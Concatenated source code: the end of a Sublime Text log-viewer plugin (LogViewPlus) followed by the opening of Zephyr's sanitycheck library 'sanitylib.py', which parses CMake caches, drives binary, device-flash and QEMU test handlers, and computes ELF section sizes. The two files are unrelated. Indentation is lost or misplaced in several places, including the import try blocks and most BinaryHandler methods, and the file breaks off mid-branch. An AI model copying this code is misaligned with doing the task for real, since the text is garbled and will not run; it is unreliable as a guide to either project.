        statusAnimation = StatusAnimation()
        statusAnimation.start(view, "Parsing", 2000, "0")
        #sublime.status_message("Processing log...")
        # Do the markup processing in its own thread.
        threading.Thread(target = self.markupView, daemon = True, args=[view, statusAnimation], kwargs={}).start()

    # Called to remove the preparations from the log file and turn it into a normal view.
    def unprepareView(self, view):
        # view.set_read_only(False)
        # view.erase_status("logviewplus")
        view.erase_status("logviewplus.0")
        view.erase_status("logviewplus.1")
        view.erase_status("logviewplus.2")
        view.erase_regions("logfile.errors")
        view.erase_regions("logfile.warnings")
        view.erase_regions("logfile.marks")
        view.erase_regions("bookmarks")
class EventListener(LogViewPlus, sublime_plugin.EventListener):
    """Hooks Sublime events to (un)prepare views using the LogViewPlus syntax."""

    # Called when a file is finished loading.
    def on_load(self, view):
        if (view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
            self.prepareView(view)

    # Called if a new view is created from an existing one. We've to check again if this view contains a logfile.
    def on_clone(self, view):
        if (view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
            self.prepareView(view)

    # Called if a text command is executed on the buffer
    def on_text_command(self, view, command_name, args):
        if (command_name == "set_file_type"):
            # The syntax is about to change; decide whether to prepare the
            # view or strip our decorations before the command runs.
            currentSyntax = view.settings().get('syntax')
            newSyntax = args["syntax"]
            if (newSyntax != currentSyntax):
                if (newSyntax == "Packages/LogViewPlus/logviewplus.tmLanguage"):
                    # If the new syntax is logviewplus then prepare the view.
                    self.prepareView(view)
                else:
                    # If the old syntax was logviewplus then remove our preparations
                    if (view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"):
                        self.unprepareView(view)
        # Always run the command as is
        return None
class LogViewPlusRescan(LogViewPlus, sublime_plugin.TextCommand):
    """Text command: re-run log markup on the current LogViewPlus view."""

    def run(self, edit):
        syntax = self.view.settings().get('syntax')
        if syntax == "Packages/LogViewPlus/logviewplus.tmLanguage":
            # Clear the previous pass before re-scanning.
            self.unprepareView(self.view)
            self.prepareView(self.view)

    def is_enabled(self):
        # Only offer the command on LogViewPlus-highlighted views.
        return self.view.settings().get('syntax') == "Packages/LogViewPlus/logviewplus.tmLanguage"
sanitylib.py | #!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
    '''Represents a CMake cache entry.

    This class understands the type system in a CMakeCache.txt, and
    converts the following cache types to Python types:

      Cache Type    Python type
      ----------    -------------------------------------------
      FILEPATH      str
      PATH          str
      STRING        str OR list of str (if ';' is in the value)
      BOOL          bool
      INTERNAL      str OR list of str (if ';' is in the value)
      ----------    -------------------------------------------
    '''

    # Regular expression for a cache entry.
    #
    # CMake variable names can include escape characters, allowing a
    # wider set of names than is easy to match with a regular
    # expression. To be permissive here, use a non-greedy match up to
    # the first colon (':'). This breaks if the variable name has a
    # colon inside, but it's good enough.
    CACHE_ENTRY = re.compile(
        r'''(?P<name>.*?) # name
        :(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
        =(?P<value>.*) # value
        ''', re.X)

    def __init__(self, name, value):
        self.name = name
        self.value = value

    def __str__(self):
        return 'CMakeCacheEntry(name={}, value={})'.format(self.name, self.value)

    @classmethod
    def _to_bool(cls, val):
        # CMake's truth rules (https://cmake.org/cmake/help/v3.0/command/if.html):
        # ON/YES/TRUE/Y and non-zero numbers are true; OFF/NO/FALSE/N/
        # IGNORE/NOTFOUND, the empty string, zero, and anything ending in
        # -NOTFOUND are false. Named constants are case-insensitive;
        # anything else must parse as an integer.
        upper = val.upper()
        if upper in ('ON', 'YES', 'TRUE', 'Y'):
            return 1
        if upper in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
            return 0
        if upper.endswith('-NOTFOUND'):
            return 0
        try:
            return int(upper) != 0
        except ValueError as exc:
            raise ValueError('invalid bool {}'.format(upper)) from exc

    @classmethod
    def from_line(cls, line, line_no):
        """Parse one CMakeCache.txt line; return an entry, or None for
        comments, blank lines, and unparseable lines."""
        # Comments can only occur at the beginning of a line.
        # (The value of an entry could contain a comment character).
        if line.startswith('//') or line.startswith('#'):
            return None
        # Whitespace-only lines do not contain cache entries.
        if not line.strip():
            return None
        match = cls.CACHE_ENTRY.match(line)
        if not match:
            return None
        name = match.group('name')
        type_ = match.group('type')
        value = match.group('value')
        if type_ == 'BOOL':
            try:
                value = cls._to_bool(value)
            except ValueError as exc:
                # Attach location information before re-raising.
                args = exc.args + ('on line {}: {}'.format(line_no, line),)
                raise ValueError(args) from exc
        elif type_ in ('STRING', 'INTERNAL'):
            # A CMake list is a ';'-separated string; expose it as a
            # Python list in that case.
            if ';' in value:
                value = value.split(';')
        return CMakeCacheEntry(name, value)
class CMakeCache:
    '''Parses and represents a CMake cache file.'''

    @staticmethod
    def from_file(cache_file):
        """Alternate constructor kept for API symmetry."""
        return CMakeCache(cache_file)

    def __init__(self, cache_file):
        self.cache_file = cache_file
        self.load(cache_file)

    def load(self, cache_file):
        """(Re)parse cache_file, replacing previously loaded entries."""
        with open(cache_file, 'r') as cache:
            parsed = [CMakeCacheEntry.from_line(line, line_no)
                      for line_no, line in enumerate(cache)]
        # from_line() returns None for comments/blank/unparseable lines.
        self._entries = OrderedDict((entry.name, entry)
                                    for entry in parsed if entry)

    def get(self, name, default=None):
        """Return the entry's value, or 'default' when absent."""
        entry = self._entries.get(name)
        return default if entry is None else entry.value

    def get_list(self, name, default=None):
        """Return the entry's value coerced to a list of strings."""
        entry = self._entries.get(name)
        if entry is None:
            return [] if default is None else default
        value = entry.value
        if isinstance(value, list):
            return value
        if isinstance(value, str):
            # A non-empty scalar becomes a one-element list.
            return [value] if value else []
        msg = 'invalid value {} type {}'
        raise RuntimeError(msg.format(value, type(value)))

    def __contains__(self, name):
        return name in self._entries

    def __getitem__(self, name):
        return self._entries[name].value

    def __setitem__(self, name, entry):
        if not isinstance(entry, CMakeCacheEntry):
            msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
            raise TypeError(msg.format(type(entry), entry))
        self._entries[name] = entry

    def __delitem__(self, name):
        del self._entries[name]

    def __iter__(self):
        # Iterate over entry objects, mirroring the original behavior.
        return iter(self._entries.values())
class SanityCheckException(Exception):
    """Root of the sanitycheck exception hierarchy."""
    pass
class SanityRuntimeError(SanityCheckException):
    """Raised for runtime failures while executing sanity checks."""
    pass
class ConfigurationError(SanityCheckException):
    """Configuration problem; the message is prefixed with the offending file."""

    def __init__(self, cfile, message):
        super().__init__(cfile + ": " + message)
class BuildError(SanityCheckException):
    """Raised when building a test binary fails."""
    pass
class ExecutionError(SanityCheckException):
    """Raised when executing a built test fails."""
    pass
class HarnessImporter:
    """Instantiate a harness class by name from scripts/sanity_chk/harness.py."""

    def __init__(self, name):
        # Make the harness module importable before calling __import__.
        sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
        module = __import__("harness")
        if name:
            my_class = getattr(module, name)
        else:
            # Fall back to the generic "Test" harness when none is named.
            my_class = getattr(module, "Test")
        # Ready-to-use harness instance for the caller.
        self.instance = my_class()
class Handler:
    def __init__(self, instance, type_str="build"):
        """Constructor

        @param instance Test instance this handler drives.
        @param type_str Kind of handler (e.g. "build", "device").
        """
        self.lock = threading.Lock()  # guards state/duration
        self.state = "waiting"
        self.run = False
        self.duration = 0
        self.type_str = type_str
        self.binary = None
        self.pid_fn = None
        self.call_make_run = False
        self.name = instance.name
        self.instance = instance
        self.timeout = instance.testcase.timeout
        self.sourcedir = instance.testcase.source_dir
        self.build_dir = instance.build_dir
        self.log = os.path.join(self.build_dir, "handler.log")
        self.returncode = 0
        self.set_state("running", self.duration)
        self.generator = None
        self.generator_cmd = None
        self.args = []

    def set_state(self, state, duration):
        """Atomically update the handler's state and duration."""
        # 'with' releases the lock even if an assignment raises, unlike
        # the original bare acquire()/release() pair.
        with self.lock:
            self.state = state
            self.duration = duration

    def get_state(self):
        """Return (state, duration) as a consistent snapshot."""
        with self.lock:
            ret = (self.state, self.duration)
        return ret

    def record(self, harness):
        """Append the harness' recorded rows to recording.csv in build_dir."""
        if harness.recording:
            filename = os.path.join(self.build_dir, "recording.csv")
            with open(filename, "at") as csvfile:
                # BUG FIX: harness.fieldnames was previously passed as
                # csv.writer()'s 'dialect' positional argument, where it was
                # silently ignored; the fieldnames header is written below.
                cw = csv.writer(csvfile, lineterminator=os.linesep)
                cw.writerow(harness.fieldnames)
                for instance in harness.recording:
                    cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
    """Constructor
    @param instance Test Instance
    @param type_str Handler type string, forwarded to Handler.
    """
    super().__init__(instance, type_str)
    # Set once terminate() has been called on the running process.
    self.terminated = False
    # Tool options
    self.valgrind = False
    self.lsan = False
    self.asan = False
    self.coverage = False
def try_kill_process_by_pid(self):
    """Terminate the child recorded in the pid file, if any.

    Reads the pid from self.pid_fn, removes the file, and sends SIGTERM.
    A no-op when no pid file is set; an already-exited child is ignored.
    """
    if self.pid_fn:
        # Close the pid file promptly instead of leaking the handle
        # (the original used a bare open() with no close).
        with open(self.pid_fn) as pid_file:
            pid = int(pid_file.read())
        os.unlink(self.pid_fn)
        self.pid_fn = None  # clear so we don't try to kill the binary twice
        try:
            os.kill(pid, signal.SIGTERM)
        except ProcessLookupError:
            # Process already exited between reading the pid and killing it.
            pass
def terminate(self, proc):
    """Kill 'proc' and any pid-file child, and mark the handler terminated."""
    # encapsulate terminate functionality so we do it consistently where ever
    # we might want to terminate the proc. We need try_kill_process_by_pid
    # because of both how newer ninja (1.6.0 or greater) and .NET / renode
    # work. Newer ninja's don't seem to pass SIGTERM down to the children
    # so we need to use try_kill_process_by_pid.
    self.try_kill_process_by_pid()
    proc.terminate()
    self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
class DeviceHandler(Handler):
    """Flash the built test image onto attached real hardware (via west or
    the build generator), monitor its serial console through a Harness, and
    release the device afterwards."""

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test Instance
        """
        super().__init__(instance, type_str)
        # TestSuite owning the connected-hardware map; assigned by the caller.
        self.suite = None

    def monitor_serial(self, ser, halt_fileno, harness):
        """Thread body: read lines from the serial port, log them, and feed
        them to the harness until the harness reaches a terminal state, the
        port fails, or a byte arrives on ``halt_fileno`` (the halt pipe)."""
        log_out_fp = open(self.log, "wt")
        ser_fileno = ser.fileno()
        readlist = [halt_fileno, ser_fileno]
        while ser.isOpen():
            readable, _, _ = select.select(readlist, [], [], self.timeout)
            if halt_fileno in readable:
                logger.debug('halted')
                ser.close()
                break
            if ser_fileno not in readable:
                continue  # Timeout.
            serial_line = None
            try:
                serial_line = ser.readline()
            except TypeError:
                pass
            except serial.SerialException:
                # Port error: stop monitoring; handle() reports the outcome.
                ser.close()
                break
            # Just because ser_fileno has data doesn't mean an entire line
            # is available yet.
            if serial_line:
                sl = serial_line.decode('utf-8', 'ignore').lstrip()
                logger.debug("DEVICE: {0}".format(sl.rstrip()))
                log_out_fp.write(sl)
                log_out_fp.flush()
                harness.handle(sl.rstrip())
            if harness.state:
                ser.close()
                break
        log_out_fp.close()

    def device_is_available(self, device):
        """Return True when some connected-hardware entry for platform
        ``device`` is marked available and has a serial port."""
        for i in self.suite.connected_hardware:
            if i['platform'] == device and i['available'] and i['serial']:
                return True
        return False

    def get_available_device(self, device):
        """Claim and return the first available hardware map entry for
        platform ``device`` (marking it unavailable), or None."""
        for i in self.suite.connected_hardware:
            if i['platform'] == device and i['available'] and i['serial']:
                i['available'] = False
                i['counter'] += 1
                return i
        return None

    def make_device_available(self, serial):
        """Mark the hardware entry with the given serial port available again
        (under the global hardware-map lock)."""
        with hw_map_local:
            for i in self.suite.connected_hardware:
                if i['serial'] == serial:
                    i['available'] = True

    @staticmethod
    def run_custom_script(script, timeout):
        """Run a user-supplied pre/post script, logging its stdout; kill it
        and log an error if it exceeds ``timeout`` seconds."""
        with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
            try:
                stdout, _ = proc.communicate(timeout=timeout)
                logger.debug(stdout.decode())
            except subprocess.TimeoutExpired:
                proc.kill()
                proc.communicate()
                logger.error("{} timed out".format(script))

    def handle(self):
        """Flash onto an available device, run the test while monitoring the
        serial console, then restore device availability and record results."""
        out_state = "failed"
        # Build the flash command: either west (with optional extra runner
        # arguments) or the build generator's "flash" target.
        if self.suite.west_flash:
            command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
            if self.suite.west_runner:
                command.append("--runner")
                command.append(self.suite.west_runner)
            # There are three ways this option is used.
            # 1) bare: --west-flash
            # This results in options.west_flash == []
            # 2) with a value: --west-flash="--board-id=42"
            # This results in options.west_flash == "--board-id=42"
            # 3) Multiple values: --west-flash="--board-id=42,--erase"
            # This results in options.west_flash == "--board-id=42 --erase"
            if self.suite.west_flash != []:
                command.append('--')
                command.extend(self.suite.west_flash.split(','))
        else:
            command = [self.generator_cmd, "-C", self.build_dir, "flash"]
        # Busy-wait (1s poll) until a matching board is free in the map.
        while not self.device_is_available(self.instance.platform.name):
            logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
            time.sleep(1)
        hardware = self.get_available_device(self.instance.platform.name)
        runner = hardware.get('runner', None)
        if runner:
            # A runner specified in the hardware map overrides the command
            # built above, with per-runner board-identification flags.
            # NOTE(review): board_id may be None when the map entry has
            # neither "probe_id" nor "id" — confirm the map schema guarantees
            # one of them for these runners.
            board_id = hardware.get("probe_id", hardware.get("id", None))
            product = hardware.get("product", None)
            command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
            command.append("--runner")
            command.append(hardware.get('runner', None))
            if runner == "pyocd":
                command.append("--board-id")
                command.append(board_id)
            elif runner == "nrfjprog":
                command.append('--')
                command.append("--snr")
                command.append(board_id)
            elif runner == "openocd" and product == "STM32 STLink":
                command.append('--')
                command.append("--cmd-pre-init")
                command.append("hla_serial %s" % (board_id))
            elif runner == "openocd" and product == "EDBG CMSIS-DAP":
                command.append('--')
                command.append("--cmd-pre-init")
                command.append("cmsis_dap_serial %s" % (board_id))
            elif runner == "jlink":
                command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
        serial_device = hardware['serial']
        try:
            ser = serial.Serial(
                serial_device,
                baudrate=115200,
                parity=serial.PARITY_NONE,
                stopbits=serial.STOPBITS_ONE,
                bytesize=serial.EIGHTBITS,
                timeout=self.timeout
            )
        except serial.SerialException as e:
            # Cannot even open the console: fail fast and free the device.
            self.set_state("failed", 0)
            self.instance.reason = "Failed"
            logger.error("Serial device error: %s" % (str(e)))
            self.make_device_available(serial_device)
            return
        ser.flush()
        harness_name = self.instance.testcase.harness.capitalize()
        harness_import = HarnessImporter(harness_name)
        harness = harness_import.instance
        harness.configure(self.instance)
        # Pipe used only to signal the serial-monitor thread to halt.
        read_pipe, write_pipe = os.pipe()
        start_time = time.time()
        pre_script = hardware.get('pre_script')
        post_flash_script = hardware.get('post_flash_script')
        post_script = hardware.get('post_script')
        if pre_script:
            self.run_custom_script(pre_script, 30)
        t = threading.Thread(target=self.monitor_serial, daemon=True,
                             args=(ser, read_pipe, harness))
        t.start()
        d_log = "{}/device.log".format(self.instance.build_dir)
        logger.debug('Flash command: %s', command)
        try:
            stdout = stderr = None
            with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
                try:
                    (stdout, stderr) = proc.communicate(timeout=30)
                    logger.debug(stdout.decode())
                    if proc.returncode != 0:
                        self.instance.reason = "Device issue (Flash?)"
                        with open(d_log, "w") as dlog_fp:
                            dlog_fp.write(stderr.decode())
                except subprocess.TimeoutExpired:
                    proc.kill()
                    (stdout, stderr) = proc.communicate()
                    self.instance.reason = "Device issue (Timeout)"
                    with open(d_log, "w") as dlog_fp:
                        dlog_fp.write(stderr.decode())
        except subprocess.CalledProcessError:
            os.write(write_pipe, b'x')  # halt the thread
        if post_flash_script:
            self.run_custom_script(post_flash_script, 30)
        t.join(self.timeout)
        if t.is_alive():
            logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
            out_state = "timeout"
        if ser.isOpen():
            ser.close()
        os.close(write_pipe)
        os.close(read_pipe)
        handler_time = time.time() - start_time
        if out_state == "timeout":
            # Mark every expected sub-case the harness never saw as blocked.
            for c in self.instance.testcase.cases:
                if c not in harness.tests:
                    harness.tests[c] = "BLOCK"
            self.instance.reason = "Timeout"
        self.instance.results = harness.tests
        if harness.state:
            self.set_state(harness.state, handler_time)
            if harness.state == "failed":
                self.instance.reason = "Failed"
        else:
            self.set_state(out_state, handler_time)
        if post_script:
            self.run_custom_script(post_script, 30)
        self.make_device_available(serial_device)
        self.record(harness)
class QEMUHandler(Handler):
    """Spawns a thread to monitor QEMU output from pipes

    We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
    We need to do this as once qemu starts, it runs forever until killed.
    Test cases emit special messages to the console as they run, we check
    for these to collect whether the test passed or failed.
    """

    def __init__(self, instance, type_str):
        """Constructor

        @param instance Test instance
        """
        super().__init__(instance, type_str)
        # Base path for the QEMU console fifos and the QEMU pid file,
        # both placed in the instance's build directory.
        self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
        self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")

    @staticmethod
    def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
        """Monitor-thread body: create the console fifos, read QEMU output a
        byte at a time, feed complete lines to the harness to derive the final
        state, then record the result, kill QEMU via its pid file, and remove
        the fifos.

        NOTE(review): the ``outdir`` and ``results`` arguments are accepted
        but not referenced in this implementation.
        """
        fifo_in = fifo_fn + ".in"
        fifo_out = fifo_fn + ".out"
        # These in/out nodes are named from QEMU's perspective, not ours
        if os.path.exists(fifo_in):
            os.unlink(fifo_in)
        os.mkfifo(fifo_in)
        if os.path.exists(fifo_out):
            os.unlink(fifo_out)
        os.mkfifo(fifo_out)
        # We don't do anything with out_fp but we need to open it for
        # writing so that QEMU doesn't block, due to the way pipes work
        out_fp = open(fifo_in, "wb")
        # Disable internal buffering, we don't
        # want read() or poll() to ever block if there is data in there
        in_fp = open(fifo_out, "rb", buffering=0)
        log_out_fp = open(logfile, "wt")
        start_time = time.time()
        timeout_time = start_time + timeout
        p = select.poll()
        p.register(in_fp, select.POLLIN)
        out_state = None
        line = ""
        timeout_extended = False
        while True:
            # poll() takes milliseconds; a negative budget means we are
            # already past the deadline.
            this_timeout = int((timeout_time - time.time()) * 1000)
            if this_timeout < 0 or not p.poll(this_timeout):
                if not out_state:
                    out_state = "timeout"
                break
            try:
                c = in_fp.read(1).decode("utf-8")
            except UnicodeDecodeError:
                # Test is writing something weird, fail
                out_state = "unexpected byte"
                break
            if c == "":
                # EOF, this shouldn't happen unless QEMU crashes
                out_state = "unexpected eof"
                break
            line = line + c
            if c != "\n":
                continue
            # line contains a full line of data output from QEMU
            log_out_fp.write(line)
            log_out_fp.flush()
            line = line.strip()
            logger.debug("QEMU: %s" % line)
            harness.handle(line)
            if harness.state:
                # if we have registered a fail make sure the state is not
                # overridden by a false success message coming from the
                # testsuite
                if out_state != 'failed':
                    out_state = harness.state
                # if we get some state, that means test is doing well, we reset
                # the timeout and wait for 2 more seconds to catch anything
                # printed late. We wait much longer if code
                # coverage is enabled since dumping this information can
                # take some time.
                if not timeout_extended or harness.capture_coverage:
                    timeout_extended = True
                    if harness.capture_coverage:
                        timeout_time = time.time() + 30
                    else:
                        timeout_time = time.time() + 2
            line = ""
        handler.record(harness)
        handler_time = time.time() - start_time
        logger.debug("QEMU complete (%s) after %f seconds" %
                     (out_state, handler_time))
        handler.set_state(out_state, handler_time)
        if out_state == "timeout":
            handler.instance.reason = "Timeout"
        elif out_state == "failed":
            handler.instance.reason = "Failed"
        log_out_fp.close()
        out_fp.close()
        in_fp.close()
        if os.path.exists(pid_fn):
            pid = int(open(pid_fn).read())
            os.unlink(pid_fn)
            try:
                if pid:
                    os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Oh well, as long as it's dead! User probably sent Ctrl-C
                pass
        os.unlink(fifo_in)
        os.unlink(fifo_out)

    def handle(self):
        """Start the monitor thread, then launch QEMU through the build
        generator's "run" target and record its exit status."""
        self.results = {}
        self.run = True
        # We pass this to QEMU which looks for fifos with .in and .out
        # suffixes.
        self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
        self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
        if os.path.exists(self.pid_fn):
            os.unlink(self.pid_fn)
        self.log_fn = self.log
        harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
        harness = harness_import.instance
        harness.configure(self.instance)
        self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
                                       args=(self, self.timeout, self.build_dir,
                                             self.log_fn, self.fifo_fn,
                                             self.pid_fn, self.results, harness))
        # harness.tests is filled in by the monitor thread as output arrives.
        self.instance.results = harness.tests
        self.thread.daemon = True
        logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
        self.thread.start()
        # Reset the terminal; QEMU can leave the console in a garbled state.
        subprocess.call(["stty", "sane"])
        logger.debug("Running %s (%s)" % (self.name, self.type_str))
        command = [self.generator_cmd]
        command += ["-C", self.build_dir, "run"]
        with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
            # NOTE(review): this debug line duplicates the one above; what is
            # being started here is the generator process, not a new thread.
            logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
            proc.wait()
            self.returncode = proc.returncode
        if self.returncode != 0:
            self.set_state("failed", 0)
            self.instance.reason = "Exited with {}".format(self.returncode)

    def get_fifo(self):
        """Return the fifo base path handed to QEMU."""
        return self.fifo_fn
class SizeCalculator:
    """Compute RAM/ROM usage of a built Zephyr ELF by classifying its
    sections (as reported by objdump -h) into allocated, read-write and
    read-only groups."""

    # Sections that occupy RAM only (zero-initialized / uninitialized).
    alloc_sections = [
        "bss",
        "noinit",
        "app_bss",
        "app_noinit",
        "ccm_bss",
        "ccm_noinit"
    ]

    # Sections counted against both RAM and ROM (initialized data copied
    # from flash at boot).
    rw_sections = [
        "datas",
        "initlevel",
        "exceptions",
        "initshell",
        "_static_thread_area",
        "_k_timer_area",
        "_k_mem_slab_area",
        "_k_mem_pool_area",
        "sw_isr_table",
        "_k_sem_area",
        "_k_mutex_area",
        "app_shmem_regions",
        "_k_fifo_area",
        "_k_lifo_area",
        "_k_stack_area",
        "_k_msgq_area",
        "_k_mbox_area",
        "_k_pipe_area",
        "net_if",
        "net_if_dev",
        "net_l2_data",
        "_k_queue_area",
        "_net_buf_pool_area",
        "app_datas",
        "kobject_data",
        "mmu_tables",
        "app_pad",
        "priv_stacks",
        "ccm_data",
        "usb_descriptor",
        "usb_data", "usb_bos_desc",
        'log_backends_sections',
        'log_dynamic_sections',
        # 'log_const_sections' appeared twice in the original list; the
        # duplicate was removed (membership semantics are unchanged).
        'log_const_sections',
        "app_smem",
        'shell_root_cmds_sections',
        "font_entry_sections",
        "priv_stacks_noinit",
        "_GCOV_BSS_SECTION_NAME",
        "gcov",
        "nocache"
    ]

    # These get copied into RAM only on non-XIP
    ro_sections = [
        "rom_start",
        "text",
        "ctors",
        "init_array",
        "reset",
        "object_access",
        "rodata",
        "devconfig",
        "net_l2",
        "vector",
        "sw_isr_table",
        "_settings_handlers_area",
        "_bt_channels_area",
        "_bt_br_channels_area",
        "_bt_services_area",
        "vectors",
        "net_socket_register",
        "net_ppp_proto"
    ]

    def __init__(self, filename, extra_sections):
        """Constructor

        @param filename Path to the output binary
        @param extra_sections Extra section names to treat as recognized
        The <filename> is parsed by objdump to determine section sizes
        """
        # Make sure this is an ELF binary
        with open(filename, "rb") as f:
            magic = f.read(4)
        try:
            if magic != b'\x7fELF':
                raise SanityRuntimeError("%s is not an ELF binary" % filename)
        except Exception as e:
            print(str(e))
            sys.exit(2)
        # Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
        # GREP can not be used as it returns an error if the symbol is not
        # found.
        is_xip_command = "nm " + filename + \
                         " | awk '/CONFIG_XIP/ { print $3 }'"
        is_xip_output = subprocess.check_output(
            is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
            "utf-8").strip()
        try:
            if is_xip_output.endswith("no symbols"):
                raise SanityRuntimeError("%s has no symbol information" % filename)
        except Exception as e:
            print(str(e))
            sys.exit(2)
        # XIP if the CONFIG_XIP symbol was present at all.
        self.is_xip = (len(is_xip_output) != 0)
        self.filename = filename
        self.sections = []
        self.rom_size = 0
        self.ram_size = 0
        self.extra_sections = extra_sections
        self._calculate_sizes()

    def get_ram_size(self):
        """Get the amount of RAM the application will use up on the device

        @return amount of RAM, in bytes
        """
        return self.ram_size

    def get_rom_size(self):
        """Get the size of the data that this application uses on device's flash

        @return amount of ROM, in bytes
        """
        return self.rom_size

    def unrecognized_sections(self):
        """Get a list of sections inside the binary that weren't recognized

        @return list of unrecognized section names
        """
        slist = []
        for v in self.sections:
            if not v["recognized"]:
                slist.append(v["name"])
        return slist

    def _calculate_sizes(self):
        """ Calculate RAM and ROM usage by section """
        objdump_command = "objdump -h " + self.filename
        objdump_output = subprocess.check_output(
            objdump_command, shell=True).decode("utf-8").splitlines()
        for line in objdump_output:
            words = line.split()
            if not words:  # Skip lines that are too short
                continue
            index = words[0]
            if not index[0].isdigit():  # Skip lines that do not start
                continue  # with a digit
            name = words[1]  # Skip lines with section names
            if name[0] == '.':  # starting with '.'
                continue
            # TODO this doesn't actually reflect the size in flash or RAM as
            # it doesn't include linker-imposed padding between sections.
            # It is close though.
            size = int(words[2], 16)
            if size == 0:
                continue
            load_addr = int(words[4], 16)
            virt_addr = int(words[3], 16)
            # Add section to memory use totals (for both non-XIP and XIP scenarios)
            # Unrecognized section names are not included in the calculations.
            recognized = True
            if name in SizeCalculator.alloc_sections:
                self.ram_size += size
                stype = "alloc"
            elif name in SizeCalculator.rw_sections:
                self.ram_size += size
                self.rom_size += size
                stype = "rw"
            elif name in SizeCalculator.ro_sections:
